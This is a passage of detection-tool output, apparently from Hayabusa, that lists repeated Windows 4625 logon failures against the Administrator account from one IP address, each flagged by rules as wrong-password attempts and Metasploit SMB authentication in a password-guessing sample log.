Password,User: Administrator : Type: 3 : Workstation: RwQgMM9H1oN4te9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JbGILYTcFwtYbDk1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5KzNsgWvyUhNEHd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGvwbOtP3A5eDKCZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YZvtNNX511hIleST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJBRTeW6OQtNrt5u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hovgq99STVt2GzrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4kpT3gf0VCAVuVSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiB04AvkYp0PP3n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PPluKgaiT10oC35V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8nCOM9uUeqv9QBx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dSPrrNCh2FSWZKbI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLDnCjr4pSdKAMX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0UnmfB7lcXKEAvn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogjMSxcUw7cF5dMa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75uB8ejsSV5CbagM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5MMHLnyrzBQxluHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QXLn6fpmR52RBAz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcdlrSUzcFNpaK5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJjiRO5rJzZ8XtqP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ncBraDdG2htkHjXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lo9DNrL44Z2S2SYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QKcFiKC5QiIoHtxy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sqvq9GwuPCO15lUV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XzgtJ3qUmkFiIY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1wc1Hjb4AK0Np1q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKYNy0JyxIlFusMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IrcKp13ut9M0pCi0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B3lJSH0r8iHAVhPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ju3lCbvbwvkIKsBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dQOHcZeAKQG6wHhC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBPkgoKDLABqdSQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqj4xOCsJg1j3IIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhBIu6wUPHc3DZAy : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0fI1GhH5YTOHbNN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7mLOWiojillZNYH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37dknpwsl8j1WRWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gzVum7a21sQe3fMt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JCFPSQmywelTXg74 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCqb6TVV14hVX3NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 3qJsJrxVARedOdd3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7iNkrkBNEbXPK0B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bio4zciNRolyeHc1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFf1vN5MgAIsdZvx : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zWhgUQSWAycVdYoS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugHUJZuKHYfUHXWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AUeUmYa72BzHfyhK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
